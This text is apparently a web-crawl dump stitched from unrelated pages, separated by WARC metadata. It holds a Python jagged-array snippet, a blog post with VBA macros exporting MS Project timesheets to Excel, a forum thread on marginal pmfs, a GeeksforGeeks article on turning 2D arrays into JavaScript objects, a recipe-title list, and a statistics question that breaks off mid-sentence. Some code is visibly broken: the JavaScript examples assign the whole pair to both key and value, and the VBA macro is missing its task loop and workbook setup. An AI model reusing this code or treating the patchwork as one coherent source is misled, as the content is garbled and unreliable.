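fruit = [["apple", "mango"],
         ["orange", "banana"]]
for i in range(2):
    for j in range(2):
        print(f"fruitArray[{i},{j}] = {fruit[i][j]}")

# Jagged layout: rows are independent arrays and may differ in length.
jagged = [["apple", "mango"],
          ["orange", "banana", "guava"]]
for row in jagged:
    print(" ".join(row))
```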
[ null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20444%20234'%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79741895,"math_prob":0.87941986,"size":6683,"snap":"2021-04-2021-17","text_gpt3_token_len":1586,"char_repetition_ratio":0.17502621,"word_repetition_ratio":0.12752858,"special_character_ratio":0.24524914,"punctuation_ratio":0.11893584,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9704368,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-17T04:23:38Z\",\"WARC-Record-ID\":\"<urn:uuid:a6b26edc-795b-40f8-9c02-3e7a93ea8b96>\",\"Content-Length\":\"561786\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2613bdd1-40e8-4f3f-b76f-755cf2e8457f>\",\"WARC-Concurrent-To\":\"<urn:uuid:822be551-25a7-4818-8ccc-53f82701969c>\",\"WARC-IP-Address\":\"172.67.73.6\",\"WARC-Target-URI\":\"https://www.softwaretestinghelp.com/c-sharp/multi-dimensional-and-jagged-arrays-in-csharp/\",\"WARC-Payload-Digest\":\"sha1:EE5E5GWXC7I2YBQWHQKU6TG2NSYF2PHW\",\"WARC-Block-Digest\":\"sha1:FJUKKVUYZJXAJKCMJJCO7YJ5O7Y7XVFR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038101485.44_warc_CC-MAIN-20210417041730-20210417071730-00010.warc.gz\"}"}
http://www.waldherr.org/tag/excel2010/
[ "# Export timesheets from MS Project to MS Excel\n\nNot many people on projects typically have MS Project licenses and can read my project plan on their own. Nonetheless everyone has to know what’s going on. Here is a simple macro to export a list of tasks to an Excel spreadsheet for all active resources on the project. You can\n\n• exclude resources (see the NoShow list)\n• customize the target directory (defaultl “C\\:temp”)\n• customize the file names (defaults to Timesheet – <Year> – <Calendar Week> – <Name>\n\nHere is what the resulting files look like. Note that work, actual work and remaining work are displayed in days. The first column contains a field (text28) which I use in MS Project to assign tasks to projects.", null, "All tasks that finish in the current week are highlighted in red, all task that finish in the subsequent week are highlighted in yellow.\n\nIf you run the macro twice in one week, you’ll first have to remove the files of the first run.\n\nCaveat: the macro works reliably only if there is at most one resource assigned to a task.\n\nNo idea, how to use this code? Check out, how to add VBA code to your computer.\n\n```\nOption Explicit\n\nFunction IsInArray(stringToBeFound As String, arr As Variant) As Boolean\nIsInArray = (UBound(Filter(arr, stringToBeFound)) > -1)\nEnd Function\n\n'\n' dumps all tasks for all resources into individual excel files\n' works only iff there is at most one resource per task\n'\nPublic Sub swaCreateTimeSheets()\nDim r As Resource\nDim realname As String\nDim swaPath As String\nDim swaPrefix As String\nDim swaFilename As String\nDim swaRange As String\nDim i As Integer\n\nDim datTestDate As Date\nDim intCalendarWeek As Integer\nDim intCalendarWeekFinish As Integer\nDim strCalendarWeek As String\n\nDim excelApp As Object, swaWorkbook As Object\nDim swaWorksheet As Worksheet\n\n' list path to files here\nswaPath = \"C:\\TEMP\\\" ' must finish with backslash and MUST BE ACCESSIBLE FOR USER (hint C:\\ does not work in my case)\n\n' prefix for filename\nswaPrefix = \"Timesheet\"\n\n' list here all employees that should not be dumped\nDim NoShow(17) As String\nNoShow(0) = \"Mickey Mouse\"\nNoShow(1) = \"Donald Duck\"\nNoShow(2) = \"Joe Schmoe\"\nNoShow(3) = \"NN\"\nNoShow(4) = \"NN\"\nNoShow(5) = \"NN\"\nNoShow(6) = \"NN\"\nNoShow(7) = \"NN\"\nNoShow(8) = \"NN\"\nNoShow(9) = \"NN\"\nNoShow(10) = \"NN\"\nNoShow(11) = \"NN\"\nNoShow(12) = \"NN\"\nNoShow(13) = \"NN\"\nNoShow(14) = \"NN\"\nNoShow(15) = \"NN\"\nNoShow(16) = \"NN\"\n\ndatTestDate = DateSerial(Year(VBA.Date + (8 - Weekday(VBA.Date)) Mod 7 - 3), 1, 1)\nintCalendarWeek = (VBA.Date - datTestDate - 3 + (Weekday(datTestDate) + 1) Mod 7) \\ 7 + 1 'check out the actual calendar week\nIf intCalendarWeek < 10 Then\nstrCalendarWeek = \"0\" & CStr(intCalendarWeek)\nElse\nstrCalendarWeek = CStr(intCalendarWeek)\nEnd If\n\nFor Each r In ActiveProject.Resources\n' skip irregular entries\nIf Not (r Is Nothing) Then\n' skip no-show employees\nIf Not IsInArray(r.Name, NoShow) Then\n' skip resource with zero remaining work\nIf r.RemainingWork > 0 Then\nswaFilename = swaPath + swaPrefix + \"-\" + CStr(Year(VBA.Date)) + \"-\" + strCalendarWeek + \"-\" + r.Name + \".xlsx\"\n' create the excel file and write header\nIf Not FileExists(swaFilename) Then\n' filename is swaPath + year + KW (leading zero) + Name + \".xlsx\"\n'\nApplication.StatusBar = \"Dumping \" + swaFilename\n\nSet excelApp = CreateObject(\"Excel.Application\")\nexcelApp.Visible = False\nSet swaWorksheet = excelApp.Worksheets(1) ' work 
with first worksheet\n\n' write header: name, date, actual work in hours, ...\nswaWorksheet.Cells(1, 1) = \"Project\"\nswaWorksheet.Cells(1, 3) = \"UID\"\nswaWorksheet.Cells(1, 4) = \"Name\"\nswaWorksheet.Cells(1, 5) = \"Start\"\nswaWorksheet.Cells(1, 6) = \"Finish\"\nswaWorksheet.Cells(1, 7) = \"Work [d]\"\nswaWorksheet.Cells(1, 8) = \"Actual Work [d]\"\nswaWorksheet.Cells(1, 9) = \"Remaining Work [d]\"\n\nswaWorksheet.Rows(1).EntireRow.Font.Bold = True\n\nexcelApp.ScreenUpdating = False\nexcelApp.Calculation = xlCalculationManual\n\ni = 1\n\n' now dump all tasks with remaining work > 0\nIf InStr(t.ResourceNames, \"[\") = 0 Then\nrealname = t.ResourceNames\nElse\nrealname = Left(t.ResourceNames, InStr(t.ResourceNames, \"[\") - 1)\nEnd If\nIf realname = r.Name And t.RemainingWork > 0 Then\ni = i + 1\n' write info to excel\nswaWorksheet.Cells(i, 1) = t.Text28\nswaWorksheet.Cells(i, 2) = t.OutlineParent.Name\nswaWorksheet.Cells(i, 3) = t.UniqueID\nswaWorksheet.Cells(i, 4) = t.Name\nswaWorksheet.Cells(i, 5) = t.Start\nswaWorksheet.Cells(i, 6) = t.Finish\nswaWorksheet.Cells(i, 7) = t.Work / (60 * 8)\nswaWorksheet.Cells(i, 8) = t.ActualWork / (60 * 8)\nswaWorksheet.Cells(i, 9) = t.RemainingWork / (60 * 8)\n' Debug.Print t.Text28; \" \"; t.OutlineParent.Name; \" \"; realname; \" \"; t.Name, t.Start; t.Finish; t.Work / 60; t.ActualWork / 60; t.RemainingWork / 60\n' if Finish Date in the same calendar week then highlight the entire row\ndatTestDate = DateSerial(Year(t.Finish + (8 - Weekday(t.Finish)) Mod 7 - 3), 1, 1)\nintCalendarWeekFinish = (t.Finish - datTestDate - 3 + (Weekday(datTestDate) + 1) Mod 7) \\ 7 + 1\nIf intCalendarWeekFinish = intCalendarWeek Then\n' Debug.Print realname, intCalendarWeek\nswaWorksheet.Rows(i).EntireRow.Interior.ColorIndex = 3 ' finish this week -> red\nEnd If\nIf intCalendarWeekFinish = intCalendarWeek + 1 Then\n' Debug.Print realname, intCalendarWeek\nswaWorksheet.Rows(i).EntireRow.Interior.ColorIndex = 6 ' finish next week -> yellow\nEnd If\nEnd If\nNext t\n' pimp excel file, close excel file and clean up\nswaWorkbook.Sheets(1).Columns(\"A:I\").AutoFit\n' tricky\nexcelApp.Goto swaWorkbook.Sheets(1).Range(\"A2\")\nexcelApp.ActiveWindow.FreezePanes = True\n' format columns and stuff\nswaWorkbook.Sheets(1).Columns(\"A\").ColumnWidth = 20\nswaWorkbook.Sheets(1).Columns(\"B\").ColumnWidth = 70\nswaWorkbook.Sheets(1).Columns(\"C\").ColumnWidth = 6\nswaWorkbook.Sheets(1).Columns(\"D\").ColumnWidth = 70\nswaWorkbook.Sheets(1).Columns(\"G\").NumberFormat = \"0.0\"\nswaWorkbook.Sheets(1).Columns(\"H\").NumberFormat = \"0.0\"\nswaWorkbook.Sheets(1).Columns(\"I\").NumberFormat = \"0.0\"\n'\nexcelApp.ActiveWorkbook.Sheets(1).Activate ' ugly, but works\nWith excelApp.ActiveSheet\n.AutoFilterMode = False\n.Range(\"A1:I1\").AutoFilter\nEnd With\n\n' if on Excel >= 2010 then select all entries and autoformat table\n' swaRange = \"\\$A\\$1:\\$I\\$\" + CStr(i)\n' excelApp.ActiveSheet.ListObjects.Add(xlSrcRange, Range(swaRange), , xlYes).Name = \"Tabelle3\"\n' excelApp.Range(\"Tabelle3[#All]\").Select\n' excelApp.ActiveSheet.ListObjects(\"Tabelle3\").TableStyle = \"TableStyleMedium2\"\n\n' save and exit Excel\nexcelApp.ScreenUpdating = True\nexcelApp.Calculation = xlCalculationAutomatic\nswaWorkbook.SaveAs swaFilename\nswaWorkbook.Close (True)\nexcelApp.Quit\nElse\nMsgBox (\"File \" + swaFilename + \" exists. 
Lets stop here.\")\nEnd\nEnd If\nEnd If\nEnd If\nEnd If\nNext r\n\nApplication.StatusBar = \"\"\n\nEnd Sub\n\n```\n\nI find myself often using a number of worksheets in a workbook and navigating through them is cumbersome. Googling for help, I found a a post on the office blogs where a simple macro would automagically create a table of contents (TOC) of all worksheets with hyperlink shortcuts.", null, "I’ve slightly improved the version, the result:\n\n• the macro still creates a TOC 😉\n• you can add worksheets, run the macro again and it will preserve whatever you have in column B (e.g. a description)\n• you can quickly jump back to your TOC with `CTRL-G gg`. The macro adds a shortcut to the TOC sheet, by naming cell A1 “gg”.\n\nCaveat: if you change the order of the tabs and run the macro again, you’ll have to change the order of column B manually.\n\nNo idea, how to use this code? Check out, how to add VBA code to your computer.\n\n```Sub swaCreateTOC()\n\nDim wbBook As Workbook\nDim wsActive As Worksheet\nDim wsSheet As Worksheet\n\nDim lnRow As Long\nDim lnPages As Long\nDim lnCount As Long\n\nDim DataRange As Variant\nDim Irow As Long\nDim Icol As Integer\nDim MyVar As Double\n\nSet wbBook = ActiveWorkbook\n\nWith Application\n.ScreenUpdating = False\nEnd With\n\n'If the TOC sheet already exist delete it and add a new\n'worksheet.\n\nOn Error Resume Next\nWith wbBook\nDataRange = .Worksheets(\"TOC\").Range(\"B1:B10000\").Value ' read all the values at once from the Excel grid, put into an array\n.Worksheets(\"TOC\").Delete\nEnd With\nOn Error GoTo 0\n\nSet wsActive = wbBook.ActiveSheet\nWith wsActive\n.Name = \"TOC\"\nWith .Range(\"A1:B1\")\n.Value = VBA.Array(\"Worksheet\", \"Content\")\n.Font.Bold = True\nEnd With\nEnd With\n\nIf Not IsEmpty(DataRange) Then\nwsActive.Range(\"B1:B10000\").Value = DataRange ' writes all the results back to the range at once\nEnd If\n\nlnRow = 2\nlnCount = 1\n\n'Iterate through the worksheets in the workbook and create\n'of pages to be printed for each sheet on the TOC sheet.\nFor Each wsSheet In wbBook.Worksheets\nIf wsSheet.Name <> wsActive.Name Then\nwsSheet.Activate\nWith wsActive\nSubAddress:=\"'\" & wsSheet.Name & \"'!A1\", _\nTextToDisplay:=wsSheet.Name\nlnPages = wsSheet.PageSetup.Pages().Count\nEnd With\nlnRow = lnRow + 1\nlnCount = lnCount + 1\nEnd If\nNext wsSheet\n\nwsActive.Activate\nwsActive.columns(\"A:B\").EntireColumn.AutoFit\nActiveWindow.DisplayGridlines = False\n' now add the name \"gg\" to A1 of \"TOC\", so you can jump to it with CTRL-G gg" ]
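If I read the date arithmetic in `swaCreateTimeSheets` correctly, the `datTestDate` / `intCalendarWeek` lines are the standard VBA idiom for the ISO-8601 week number, which feeds the `Timesheet - <Year> - <Calendar Week> - <Name>` file name described above. For anyone who wants to sanity-check a file name outside Excel, a small Python equivalent under that assumption:

```python
import datetime as dt

def iso_week(d: dt.date) -> int:
    # what the macro's calendar-week arithmetic appears to compute:
    # the ISO-8601 week number, zero-padded in the output file name
    return d.isocalendar()[1]

today = dt.date.today()
print(f"Timesheet-{today.year}-{iso_week(today):02d}-<Name>.xlsx")
```

The macro itself of course stays in VBA; this is only a cross-check of the week-number convention.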
[ null, "http://www.waldherr.org/wp-content/uploads/2014/07/Microsoft-Excel-Timesheet-2014-28-foo-1024x216.jpg", null, "http://www.waldherr.org/wp-content/uploads/2014/06/Microsoft-Excel-Foo.xlsx_2014-06-26_08-32-462.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6137005,"math_prob":0.851603,"size":6753,"snap":"2021-31-2021-39","text_gpt3_token_len":1954,"char_repetition_ratio":0.16135724,"word_repetition_ratio":0.043165468,"special_character_ratio":0.27854288,"punctuation_ratio":0.16904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.985454,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-26T22:44:03Z\",\"WARC-Record-ID\":\"<urn:uuid:896c71b3-db15-4819-8b8f-f3b5c2811171>\",\"Content-Length\":\"29104\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a258968-5015-464f-98ac-5135f280d407>\",\"WARC-Concurrent-To\":\"<urn:uuid:21629d4c-780e-478f-ad26-be9de020a006>\",\"WARC-IP-Address\":\"109.237.134.24\",\"WARC-Target-URI\":\"http://www.waldherr.org/tag/excel2010/\",\"WARC-Payload-Digest\":\"sha1:AD46QBXTL2XUDDXBUHVZUIZKGJXXKEJG\",\"WARC-Block-Digest\":\"sha1:QY3MIJQ55SMNVHBGFASITN3B67FWQS7W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152156.49_warc_CC-MAIN-20210726215020-20210727005020-00114.warc.gz\"}"}
https://www.physicsforums.com/threads/joint-distribution-easy-qn.239758/
[ "# Joint Distribution (easy qn)\n\n## Homework Statement\n\nThe following table gives the joint probability mass function (p.m.f) of the random variables X and Y.\n\nhttp://img170.imageshack.us/img170/555/tableph9.jpg [Broken]\n\nFind the marginal p.m.f's $$P_X \\left( x \\right)$$ and $$P_Y \\left( y \\right)$$\n\n2. The attempt at a solution\n\nI think I have just missed the point of this somewhere.\nI know that:\n$${P_X \\left( x \\right) = \\sum\\limits_{all\\;y} {P_{X,Y} \\left( {x,y} \\right)} }$$\nand\n$${P_Y \\left( y \\right) = \\sum\\limits_{all\\;x} {P_{X,Y} \\left( {x,y} \\right)} }$$\n\nI just don't know how to apply this to the question properly.\n\nFor $$P_X \\left( x \\right)$$ it's the sum of $${P_{X,Y} \\left( {x,y} \\right)}$$ over all y (y=0,1,2). So do we just take the first row?\ni.e. 0.15+0.20+0.10 = 0.45?\n\nFollowing this, would\n$$P_Y \\left( y \\right)$$ be 0.35?\n\nAny help would be greatly appreciated.\nCheers\n\nLast edited by a moderator:\n\nHello,\nThe possible X values are x=0 and x=1, so if you compute\n\n$$P_x \\left( 0 \\right) = p(0,0)+p(0,1)+p(0,2)=X1$$ Find x1\n$$P_x \\left( 1 \\right) = p(1,0)+p(1,1)+p(1,2)=X2$$ Find x2\n*You basically do this for how many possible X values you have.\n\nThen the marginal pmf is then\n$$P_x \\left( x \\right) = \\left\\{ x1forx= 0; x2forx=1;0,otherwise}$$\n\nThen compute the marginal pmf of Y obtained from the column totals. Hope that makes sense.\n\nLast edited:\n\nSo I should define the marginal pmf's as?\n\n$$P_X \\left( x \\right) = \\left\\{ {\\begin{array}{*{20}c} {0.45\\;...\\;x = 0} \\\\ {0.55\\;...\\;x = 1} \\\\ \\end{array}} \\right.$$\n\n$$P_Y \\left( y \\right) = \\left\\{ {\\begin{array}{*{20}c} {0.35\\;...\\;y = 0} \\\\ {0.3\\;...\\;y = 1} \\\\ {0.35\\;...\\;y = 2} \\\\ \\end{array}} \\right.$$\n\nYes, that's correct. From what I've been taught, you also have to put {0 otherwise} but depending on how the notation that you've been taught in class/book, then it's fine.\n\nAlso, for the marginal pmf of Y you can also put for {.35 y = 0,2 . Again, a notational way to write it.\n\nLast edited:\nYep sure, that makes sense, thanks for your help!" ]
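The table image linked in the thread above is broken. The first row (0.15, 0.20, 0.10) is stated in the post, and the second row is forced by the marginals the poster arrives at (column sums 0.35, 0.30, 0.35), so the joint pmf can be reconstructed and the marginals checked with a few lines of NumPy:

```python
import numpy as np

# Reconstructed from the worked answers in the thread:
# row sums 0.45 / 0.55 and column sums 0.35 / 0.30 / 0.35.
p_xy = np.array([[0.15, 0.20, 0.10],    # X = 0, Y = 0, 1, 2
                 [0.20, 0.10, 0.25]])   # X = 1, Y = 0, 1, 2

p_x = p_xy.sum(axis=1)   # marginal pmf of X: sum over y -> [0.45, 0.55]
p_y = p_xy.sum(axis=0)   # marginal pmf of Y: sum over x -> [0.35, 0.30, 0.35]
print(p_x, p_y, p_xy.sum())   # total probability should be 1 (up to float rounding)
```

The row and column sums match the marginal pmfs given at the end of the thread.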
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.64683324,"math_prob":0.99989235,"size":950,"snap":"2022-27-2022-33","text_gpt3_token_len":346,"char_repetition_ratio":0.15856236,"word_repetition_ratio":0.014084507,"special_character_ratio":0.3736842,"punctuation_ratio":0.16444445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999774,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T23:42:55Z\",\"WARC-Record-ID\":\"<urn:uuid:c9cf980b-5ac7-4e6a-bec8-af7899fd39e3>\",\"Content-Length\":\"70683\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad763357-0e36-4071-b484-ccb236ff2038>\",\"WARC-Concurrent-To\":\"<urn:uuid:32afa6a3-e6d2-4ece-9b96-0524b552e7c5>\",\"WARC-IP-Address\":\"104.26.14.132\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/joint-distribution-easy-qn.239758/\",\"WARC-Payload-Digest\":\"sha1:NIMGVNPQHX5CFSYJC4WROMGWHUQDLKNI\",\"WARC-Block-Digest\":\"sha1:VHNPKEUUG3THJCNDRYCRDBTCU4CKIWD5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103915196.47_warc_CC-MAIN-20220630213820-20220701003820-00049.warc.gz\"}"}
https://origin.geeksforgeeks.org/how-to-convert-two-dimensional-array-into-an-object-in-javascript/?ref=lbp
[ "# How to convert two-dimensional array into an object in JavaScript ?\n\n• Difficulty Level : Basic\n• Last Updated : 16 Apr, 2021\n\nIn this article, we will learn how to convert a two-dimensional array to an object. A two-dimensional array can have any number of rows and two columns.\n\nExample:\n\n```Input: [\n[\"John\", 12],\n[\"Jack\", 13],\n[\"Matt\", 14],\n[\"Maxx\", 15]\n]\n\nOutput: {\n\"John\": 12,\n\"Jack\": 13,\n\"Matt\": 14,\n\"Maxx\": 15\n}```\n\nThe below approaches can be followed to solve the problem.\n\nApproach 1: In this approach, we create an empty object and use the Array.forEach() method to iterate over the array. On every iteration, we insert the first item of the child array into the object as a key and the second item as the value. Then it returns the object after the iterations.\n\nExample:\n\n## Javascript\n\n `function` `arr2obj(arr) { ` ` `  `    ``// Create an empty object ` `    ``let obj = {}; ` ` `  `    ``arr.forEach((v) => { ` ` `  `        ``// Extract the key and the value ` `        ``let key = v; ` `        ``let value = v; ` ` `  `        ``// Add the key and value to ` `        ``// the object ` `        ``obj[key] = value; ` `    ``}); ` ` `  `    ``// Return the object ` `    ``return` `obj; ` `} ` ` `  `console.log( ` `    ``arr2obj([ ` `        ``[``\"John\"``, 12], ` `        ``[``\"Jack\"``, 13], ` `        ``[``\"Matt\"``, 14], ` `        ``[``\"Maxx\"``, 15], ` `    ``]) ` `); `\n\nOutput:\n\n```{\nJack: 13,\nJohn: 12,\nMatt: 14,\nMaxx: 15\n}```\n\nApproach 2: In this approach, we will use the Array.reduce() method and initialize the accumulator with an empty object. On every iteration, we assign the current value as the key’s value of the accumulator and return the accumulator. Then it returns the object after the iterations.\n\nExample:\n\n## Javascript\n\n `function` `arr2obj(arr) { ` `    ``return` `arr.reduce( ` `        ``(acc, curr) => { ` `             `  `            ``// Extract the key and the value ` `            ``let key = curr; ` `            ``let value = curr; ` ` `  `            ``// Assign key and value ` `            ``// to the accumulator ` `            ``acc[key] = value; ` ` `  `            ``// Return the accumulator ` `            ``return` `acc; ` `        ``}, ` ` `  `        ``// Initialize with an empty object ` `        ``{} ` `    ``); ` `} ` ` `  `console.log( ` `    ``arr2obj([ ` `        ``[``\"Eren\"``, ``\"Yeager\"``], ` `        ``[``\"Mikasa\"``, ``\"Ackermann\"``], ` `        ``[``\"Armin\"``, ``\"Arlelt\"``], ` `        ``[``\"Levi\"``, ``\"Ackermann\"``], ` `    ``]) ` `); `\n\nOutput:\n\n```{\nEren: 'Yeager',\nMikasa: 'Ackermann',\nArmin: 'Arlelt',\nLevi: 'Ackermann'\n}```\n\nApproach 3: In this approach, we first flatten the array using the Array.flat() method so that we get a one-dimensional array. 
We can then create an empty object and iterate the array to assign evenly positioned values as the key of the object and oddly positioned values as the value.\n\nExample:\n\n## Javascript\n\n `function` `arr2obj(arr) { ` ` `  `    ``// Flatten the array ` `    ``arr = arr.flat(); ` ` `  `    ``// Create an empty object ` `    ``let obj = {}; ` ` `  `    ``for` `(let i = 0; i < arr.length; i++) { ` `        ``if` `(i % 2 == 0) { ` ` `  `            ``// Extract the key and the value ` `            ``let key = arr[i]; ` `            ``let value = arr[i + 1]; ` ` `  `            ``// Assign the key and value ` `            ``obj[key] = value; ` `        ``} ` `    ``} ` ` `  `    ``return` `obj; ` `} ` ` `  `console.log( ` `    ``arr2obj([ ` `        ``[``\"Max\"``, 19], ` `        ``[``\"Chloe\"``, 20], ` `        ``[``\"Nathan\"``, 22], ` `        ``[``\"Mark\"``, 31], ` `    ``]) ` `); `\n\nOutput:\n\n```{\nMax: 19,\nChloe: 20,\nNathan: 22,\nMark: 31\n}```\n\nMy Personal Notes arrow_drop_up\nRecommended Articles\nPage :" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5509045,"math_prob":0.9626094,"size":2676,"snap":"2022-40-2023-06","text_gpt3_token_len":776,"char_repetition_ratio":0.13173653,"word_repetition_ratio":0.12804878,"special_character_ratio":0.34491777,"punctuation_ratio":0.22445256,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99754333,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T23:58:23Z\",\"WARC-Record-ID\":\"<urn:uuid:3226e33c-ca07-4bcc-8fdc-0b5a8c249162>\",\"Content-Length\":\"225039\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:21256c57-a0a5-4d91-b25f-e7dca1fee051>\",\"WARC-Concurrent-To\":\"<urn:uuid:796833bc-92f5-4552-9e4d-8b323068da2a>\",\"WARC-IP-Address\":\"44.228.100.190\",\"WARC-Target-URI\":\"https://origin.geeksforgeeks.org/how-to-convert-two-dimensional-array-into-an-object-in-javascript/?ref=lbp\",\"WARC-Payload-Digest\":\"sha1:X2QCQWNREWCF3KWPZFFITMP2WV632QSM\",\"WARC-Block-Digest\":\"sha1:TC4FO6DIXPTFOTTYIGR3OF27FATSZMTB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337680.35_warc_CC-MAIN-20221005234659-20221006024659-00034.warc.gz\"}"}
https://www.dezyre.com/recipes/company/mudracircle
[ "# Recipes used by Mudracircle developers\n\nCATEGORY\nHow to deal with an Item in a List in Python?\nHow to convert Strings to DateTimes in Python?\nHow to select DateTime within a range in Python?\nHow to deal with Rolling Time Window in Python?\nHow to introduce LAG time in Python?\nHow to deal with missing values in a Timeseries in Python?\nHow to encode Days of a week in Python?\nHow to calculate difference between Dates in Python?\nHow to split DateTime Data to create multiple feature in Python?\nHow to standardise IRIS Data in Python?\nHow to standardise features in Python?\nHow to rescale features in Python?\nHow to process categorical features in Python?\nOne hot Encoding with nominal categorical features in Python?\nOne hot Encoding with multiple labels in Python?\nHow to impute missing values with means in Python?\nHow to deal with outliers in Python?\nHow to deal with imbalance classes with upsampling in Python?\nHow to deal with imbalance classes with downsampling in Python?\nHow to encode ordinal categorical features in Python?\nHow to find outliers in Python?\nHow to delete instances with missing values in Python?\nHow to impute missing class labels using nearest neighbours in Python?\nHow to impute missing class labels in Python?\nHow to convert Categorical features to Numerical Features in Python?\nHow to prepare a machine learning workflow in Python?\nHow to Create simulated data for clustering in Python?\nHow to Create simulated data for classification in Python?\nHow to Create simulated data for regression in Python?\nHow to load sklearn Boston Housing data?\nHow to load features from a Dictionary in python?\nHow to add and subtract between matrices?\nHow to Divide each element of a matrix by a numerical value?\nHow to MULTIPLY numerical value to each element of a matrix?\nHow to SUBTRACT numerical value to each element of a matrix?\nHow to ADD numerical value to each element of a matrix?\nHow to calculate dot product of two vectors?\nHow to find Maximum and Minimum values in a Matrix?\nHow to find the Rank of a Matrix?\nHow to create RANDOM Numbers in Python?\nHow to define WHILE Loop in Python?\nHow to define FOR Loop in Python?\nHow to deal with Dictionary Basics in Python?\nHow to Create and Delete a file in Python?\nHow to convert STRING to DateTime in Python?\nHow to use CONTINUE and BREAK statement within a loop in Python?\nHow to do numerical operations in Python using Numpy?\nHow to Flatten a Matrix?\nHow to Calculate Determinant of a Matrix or ndArray?\nHow to calculate Diagonal of a Matrix?\nHow to Calculate Trace of a Matrix?\nHow to invert a matrix or nArray in Python?\nHow to convert a dictionary to a matrix or nArray in Python?\nHow to reshape a Numpy array in Python?\nHow to select elements from Numpy array in Python?\nHow to create a sparse Matrix in Python?\nHow to Create a Vector or Matrix in Python?\nHow to randomly sample a Pandas DataFrame?\nHow to rank a Pandas DataFrame?\nHow to format string in a Pandas DataFrame Column?\nHow to create Pivot table using a Pandas DataFrame?\nHow to Normalise a Pandas DataFrame Column?\nHow to calculate MOVING AVG in a Pandas DataFrame?\nHow to deal with missing values in a Pandas DataFrame?\nHow to map values in a Pandas DataFrame?\nHow to list unique values in a Pandas DataFrame?\nHow to JOIN and MERGE Pandas DataFrame?\nHow to group rows in a Pandas DataFrame?\nHow to find the largest value in a Pandas DataFrame?\nHow to filter in a Pandas DataFrame?\nHow to drop ROW and COLUMN in a Pandas DataFrame?\nHow to 
get descriptive statistics of a Pandas DataFrame?\nHow to delete duplicates from a Pandas DataFrame?\nHow to create crosstabs from a Dictionary in Python?\nHow to create a new column based on a condition in Python?\nHow to insert a new column based on condition in Python?\nHow to convert string variables into DateTime variables in Python?\nHow to convert string categorical variables into numerical variables using Label Encoder?\nHow to convert string categorical variables into numerical variables in Python?\nHow to convert categorical variables into numerical variables in Python?\nHow to preprocess string data within a Pandas DataFrame?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7066685,"math_prob":0.65950316,"size":4152,"snap":"2020-34-2020-40","text_gpt3_token_len":923,"char_repetition_ratio":0.32569912,"word_repetition_ratio":0.25,"special_character_ratio":0.21050097,"punctuation_ratio":0.10214376,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9890758,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-07T00:07:11Z\",\"WARC-Record-ID\":\"<urn:uuid:64bb73d2-b2cd-4aea-a210-90f571e57f63>\",\"Content-Length\":\"58545\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f5ebde56-5429-40aa-be8a-53df67adb0af>\",\"WARC-Concurrent-To\":\"<urn:uuid:44e4f16b-ee98-47be-90ec-aa1095f08c00>\",\"WARC-IP-Address\":\"184.173.29.42\",\"WARC-Target-URI\":\"https://www.dezyre.com/recipes/company/mudracircle\",\"WARC-Payload-Digest\":\"sha1:KZQSV7Z7A27NR3SHAYI6USRLGIO4LB7J\",\"WARC-Block-Digest\":\"sha1:D5QXCA2GR2SZF3QIH6DXU2UCOQHLAHDV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439737050.56_warc_CC-MAIN-20200807000315-20200807030315-00349.warc.gz\"}"}
https://stats.stackexchange.com/questions/67537/permutation-bootstrapping-for-testing-difference-of-difference
[ "# permutation/bootstrapping for testing difference of difference\n\nI have a situation where I have 3 treatments/conditions A, B, C. For each condition I have multiple trials.\n\nI compare the means of trials under each condition A, B and C. This gives me 3 values.\n\nThen I am computing a difference A-B and A-C. I need to obtain confidence interval/error bars for the single value obtained when I do the subtraction of mean response to condition A and mean response to condition B (A-B) same goes for A-C. Essentially I want to ask is the difference seen in mean response A-B different from mean response A-C.\n\nI know potentially some bootstrapping/permutation test is what is needed but not sure which way to do this since its not a direct comparison of mean of A vs mean of B but rather A-B compared to A-C. Help will be appreciated.\n\n• Why aren't you just testing B vs. C? Getting the difference from A for both only changes the 